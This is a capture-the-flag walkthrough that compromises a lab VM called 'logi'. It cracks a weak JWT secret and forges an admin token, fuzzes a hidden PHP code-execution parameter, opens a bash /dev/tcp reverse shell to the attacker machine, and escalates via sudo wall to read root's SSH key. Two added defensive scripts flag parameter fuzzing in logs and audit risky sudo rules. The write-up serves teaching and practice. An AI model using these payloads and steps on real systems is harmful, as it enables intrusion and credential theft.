Information gathering

```
┌──(root㉿kali)-[~]
└─# arp-scan -l | grep PCS
192.168.31.194  08:00:27:18:03:eb       PCS Systemtechnik GmbH

┌──(root㉿kali)-[~]
└─# IP=192.168.31.194
```
```
┌──(root㉿kali)-[~]
└─# nmap -sV -sC -A $IP -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-30 14:25 EDT
Nmap scan report for logi (192.168.31.194)
Host is up (0.0017s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: TI15 AME\xE5\x8A\xA9\xE5\xA8\x81
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:18:03:EB (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.65 ms logi (192.168.31.194)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.23 seconds
```
First, take a look at the home page:

```
┌──(root㉿kali)-[~]
└─# curl -s $IP
...
<!--ame:jiayouachunyu-->
```
Directory scanning

```
┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$IP -x php,php3,txt,html,bk,bak,zip,tar,gz,shtml
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.31.194
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              zip,shtml,php,php3,tar,gz,txt,html,bk,bak
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 3281]
/.html                (Status: 403) [Size: 278]
/user                 (Status: 200) [Size: 2170]
/user.php             (Status: 200) [Size: 2170]
/admin                (Status: 200) [Size: 1576]
/admin.php            (Status: 200) [Size: 1576]
/.html                (Status: 403) [Size: 278]
/.php                 (Status: 403) [Size: 278]
/server-status        (Status: 403) [Size: 278]
Progress: 2426160 / 2426171 (100.00%)
===============================================================
Finished
===============================================================
```
Logging in to user.php with ame:jiayouachunyu works and returns a JWT:

```
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJtb2JhbiIsImlhdCI6MTc1OTI1NzEwMywiZXhwIjoxNzU5MjYwNzAzLCJzdWIiOiJhbWUiLCJyb2xlIjoidXNlciJ9.iMbyjqjyjHxyQlTLdU8KmYdq7WlfnFQbQleI8-8lLpE
```
Brute-force the JWT with jwt_tool:

```
┌──(kali㉿kali)-[~/Desktop/jwt_tool]
└─$ python jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJtb2JhbiIsImlhdCI6MTc1OTIxNDAwNSwiZXhwIjoxNzU5MjE3NjA1LCJzdWIiOiJhbWUiLCJyb2xlIjoidXNlciJ9.3_7R14x70FFFh6OI43EOvm31WwHKtQmS7s-hUdm7y1g -C -d "/usr/share/wordlists/rockyou.txt"

 Version 2.3.0
 @ticarpi

/home/kali/.jwt_tool/jwtconf.ini
Original JWT:

[+] nevergiveup is the CORRECT key!
You can tamper/fuzz the token contents (-T/-I) and sign it using:
python3 jwt_tool.py [options here] -S hs256 -p "nevergiveup"
```

This yields the key nevergiveup.
Decoding the token with JSON Web Tokens shows that the payload is:

```json
{
  "iss": "moban",
  "iat": 1759257103,
  "exp": 1759260703,
  "sub": "ame",
  "role": "user"
}
```
Change it to:

```json
{
  "iss": "moban",
  "iat": 1759257103,
  "exp": 1759260703,
  "sub": "ame",
  "role": "admin"
}
```
Then re-encode it to get:

```
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJtb2JhbiIsImlhdCI6MTc1OTI1NzEwMywiZXhwIjoxNzU5MjYwNzAzLCJzdWIiOiJhbWUiLCJyb2xlIjoiYWRtaW4ifQ.LeStfNXO7i1_t7bhnHM7HL0uqMUoKC56XxQy3xkcjhQ
```
Swap the cookie in the browser and the admin page opens:

```html
<!doctype html>
<html lang="zh-CN">
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width,initial-scale=1">
  <title>Admin Area</title>
  <style>
    body{font-family:Segoe UI,Microsoft Yahei,Arial;background:#071029;color:#e6eef8;padding:30px}
    .card{max-width:900px;margin:30px auto;padding:20px;background:#081428;border-radius:8px}
    .btn{display:inline-block;padding:8px 12px;border-radius:6px;background:#1e90ff;color:#fff;text-decoration:none}
    .notice{color:#9fb0cc;margin-top:8px}
  </style>
</head>
<body>
  <div class="card">
    <h2>欢迎 — 管理员</h2>
    <p>你好,ame。你的身份已通过验证。</p>

    <div style="margin:16px 0;padding:12px;background:#061226;border-radius:6px">
      <p><strong>karsakarsa369.php</strong></p>
      <p>https://www.jwt.io/</p>
    </div>
  </div>
</body>
</html>
```
Following the hint, go to $IP/karsakarsa369.php:

```
┌──(root㉿kali)-[~]
└─# curl -s $IP/karsakarsa369.php
fuzz
```
The hint says to fuzz:

```
┌──(root㉿kali)-[~]
└─# ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://$IP/karsakarsa369.php?FUZZ=test -fs 4 -c

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.31.194/karsakarsa369.php?FUZZ=test
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 4
________________________________________________

:: Progress: [220559/220559] :: Job [1/1] :: 2040 req/sec :: Duration: [0:01:43] :: Errors: 0 ::
```
Several different wordlists turned up nothing. The guess is that the input may already be executing successfully, just with nothing echoed back, so try a time-based blind approach:

```
┌──(root㉿kali)-[~]
└─# ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u "http://$IP/karsakarsa369.php?FUZZ=sleep(5)%3b" -mt '>4000' -timeout 10 -t 40 -c

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.31.194/karsakarsa369.php?FUZZ=sleep(5)%3b
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response time: >4000
________________________________________________

cmd                     [Status: 200, Size: 4, Words: 1, Lines: 1, Duration: 5013ms]
:: Progress: [220559/220559] :: Job [1/1] :: 8000 req/sec :: Duration: [0:01:30] :: Errors: 0 ::
```
The scan finds the parameter cmd, so write a reverse shell.

The first attempt with the system function was blocked, so check which functions are disabled:

```
┌──(root㉿kali)-[~]
└─# curl -g "http://$IP/karsakarsa369.php?cmd=print_r(ini_get('disable_functions'));"
fuzzsystem,passthru,shell_exec,proc_open,pcntl_exec,dl
```
exec is not disabled, so that is the one to use:

```
┌──(root㉿kali)-[~]
└─# curl -g "http://$IP/karsakarsa369.php?cmd=exec(%22bash%20-c%20'bash%20-i%20%3E%26%20/dev/tcp/192.168.31.58/4444%200%3E%261'%22);"

┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.31.58] from (UNKNOWN) [192.168.31.194] 59080
bash: cannot set terminal process group (417): Inappropriate ioctl for device
bash: no job control in this shell
www-data@logi:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
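What the parameter fuzzing and the PHP passed in `cmd` look like from the web server's side, as an added detection example that is not part of the original write-up: it flags a client that tries many distinct parameter names on one script, and query values that decode to a PHP-style call. The log lines are constructed (Apache combined format, documentation IP addresses); the threshold and function name are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample in Apache "combined" format; not taken from the lab machine.
SAMPLE_LOG = """\
192.0.2.20 - - [30/Sep/2025:14:39:58 -0400] "GET /index.html HTTP/1.1" 200 3281 "-" "-"
192.0.2.20 - - [30/Sep/2025:14:39:59 -0400] "GET /user.php?page=1 HTTP/1.1" 200 2170 "-" "-"
192.0.2.10 - - [30/Sep/2025:14:40:01 -0400] "GET /karsakarsa369.php?id=test HTTP/1.1" 200 4 "-" "-"
192.0.2.10 - - [30/Sep/2025:14:40:01 -0400] "GET /karsakarsa369.php?file=test HTTP/1.1" 200 4 "-" "-"
192.0.2.10 - - [30/Sep/2025:14:40:01 -0400] "GET /karsakarsa369.php?page=test HTTP/1.1" 200 4 "-" "-"
192.0.2.10 - - [30/Sep/2025:14:40:02 -0400] "GET /karsakarsa369.php?q=test HTTP/1.1" 200 4 "-" "-"
192.0.2.10 - - [30/Sep/2025:14:41:30 -0400] "GET /karsakarsa369.php?cmd=print_r(ini_get(%27disable_functions%27))%3B HTTP/1.1" 200 60 "-" "-"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')
# Heuristic: identifier directly followed by (...) and a semicolon, e.g. sleep(5);
CODE_RE = re.compile(r"[A-Za-z_]\w*\(.*\)\s*;")

def analyse(log_text, max_param_names=3):
    """Return (clients fuzzing parameter names, requests carrying code-like values)."""
    names = defaultdict(set)   # (client, path) -> distinct parameter names seen
    code_hits = []             # (client, path, parameter, decoded value)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue           # skip lines that are not in combined format
        client, target = m.group(1), m.group(3)
        url = urlsplit(target)
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            names[(client, url.path)].add(name)
            if CODE_RE.search(value):   # parse_qsl has already percent-decoded the value
                code_hits.append((client, url.path, name, value))
    fuzzers = sorted(k for k, seen in names.items() if len(seen) > max_param_names)
    return fuzzers, code_hits

if __name__ == "__main__":
    fuzzers, code_hits = analyse(SAMPLE_LOG)
    print("parameter-name fuzzing:", fuzzers)
    print("code-like values:", code_hits)
```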
Stabilize the shell

```
Ctrl + Z
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=/bin/bash
```
Lateral movement

Look at the most recently modified files:

```
www-data@logi:/var/www/html$ find /var -type f -printf '%T@ %TY-%Tm-%Td %TH:%TM %p\n' 2>/dev/null | sort -nr | head -n 100 | cut -d' ' -f2-
...
2025-09-28 10:47 /var/backups/passwd
...
```
This looks like a password file:

```
www-data@logi:/var/www/html$ cat /var/backups/passwd
xiangwozheyangderen
```
Try logging in as ame:

```
www-data@logi:/var/www/html$ su ame
Password:
ame@logi:/var/www/html$ id
uid=1000(ame) gid=1000(ame) groups=1000(ame)
```
Privilege escalation

List the commands the current user is allowed to run through sudo:

```
ame@logi:~$ sudo -l
Matching Defaults entries for ame on logi:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\://sbin\:/usr/bin\:/sbin\:/bin

User ame may run the following commands on logi:
    (ALL) NOPASSWD: /usr/bin/wall
```
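An audit of `sudo -l` output like the listing above, as an added example that is not part of the original write-up: it parses the rule lines and flags entries that grant every command or a binary with a documented sudo technique. The `SUDO_RISKY` set is a small constructed subset, the second host is constructed, and the function name is hypothetical.

```python
import re

# Constructed subset of binaries for which GTFOBins lists a sudo technique; not a complete list.
SUDO_RISKY = {"wall", "find", "vim", "less", "tar", "awk"}

# "(runas) TAG: TAG: command, command" as printed by sudo -l
ENTRY_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(.+)$")

def audit_sudo_l(output: str, risky=SUDO_RISKY):
    """Return (command, run-as user, nopasswd) for every rule that deserves review."""
    findings, in_rules = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True        # rules follow this header; Defaults come before it
            continue
        m = ENTRY_RE.match(line) if in_rules else None
        if not m:
            continue
        runas_user = m.group(1).split(":")[0].strip()
        nopasswd = "NOPASSWD:" in m.group(2)
        # Commands are comma-separated; a literal comma inside arguments is escaped as "\,"
        for cmd in re.split(r"(?<!\\),\s*", m.group(3).strip()):
            if not cmd.strip():
                continue
            binary = cmd.split()[0]
            if binary == "ALL" or binary.rsplit("/", 1)[-1] in risky:
                findings.append((binary, runas_user, nopasswd))
    return findings

# The rule from the listing above.
PAGE_OUTPUT = """User ame may run the following commands on logi:
    (ALL) NOPASSWD: /usr/bin/wall
"""
# Constructed second host for contrast; backup-report is a hypothetical local script.
CONSTRUCTED_OUTPUT = """User ops may run the following commands on web01:
    (root) /usr/local/bin/backup-report, /usr/bin/less /var/log/syslog
    (ALL : ALL) ALL
"""

if __name__ == "__main__":
    for sample in (PAGE_OUTPUT, CONSTRUCTED_OUTPUT):
        for finding in audit_sudo_l(sample):
            print(finding)
```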
Looking up wall | GTFOBins shows that it can be used for privilege escalation:
The textual file is dumped on the current TTY (neither to stdout nor to stderr).
If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
```
LFILE=file_to_read
sudo wall --nobanner "$LFILE"
```
```
ame@logi:~$ sudo wall --nobanner "/root/.ssh/id_rsa"
ame@logi:~$
```
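There is no output here, however. That is because wall does not write its content to the current shell; it "broadcasts" the message to the terminals (TTYs) of all users currently logged in to the system. The current www-data -> su ame session is a reverse shell, which the system does not treat as a standard interactive login terminal (TTY). It is essentially just a socket to which the input and output streams of /bin/bash have been redirected, so when wall runs, the reverse shell is not in the list of broadcast targets.

Logging in over ssh and running it again does the job: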
```
┌──(root㉿kali)-[~]
└─# ssh ame@$IP
The authenticity of host '192.168.31.194 (192.168.31.194)' can't be established.
ED25519 key fingerprint is SHA256:O2iH79i8PgOwV/Kp8ekTYyGMG8iHT+YlWuYC85SbWSQ.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:2: [hashed name]
    ~/.ssh/known_hosts:4: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.31.194' (ED25519) to the list of known hosts.
ame@192.168.31.194's password:
Linux logi 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Sep 28 10:35:26 2025 from 172.20.10.11
ame@logi:~$ sudo wall --nobanner "/root/.ssh/id_rsa"

-----BEGIN OPENSSH PRIVATE KEY-----
[key body omitted]
-----END OPENSSH PRIVATE KEY-----
```
Save the private key on the attacking machine (I named it id_rsa_logi here), strip the trailing spaces and tabs from every line, then log in with the key:

```
┌──(root㉿kali)-[/home/kali/Desktop]
└─# sed -i 's/[ \t]*$//' id_rsa_logi

┌──(root㉿kali)-[/home/kali/Desktop]
└─# chmod 600 id_rsa_logi

┌──(root㉿kali)-[/home/kali/Desktop]
└─# ssh -i id_rsa_logi root@$IP
Linux logi 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Sep 29 07:40:55 2025 from ::1
root@logi:~# id
uid=0(root) gid=0(root) groups=0(root)
```
```
root@logi:~# cat /home/ame/user.txt
user:{niudexiongdiniude}
root@logi:~# cat /root/provemyself.txt
root{xiangrootzheyangderen}
```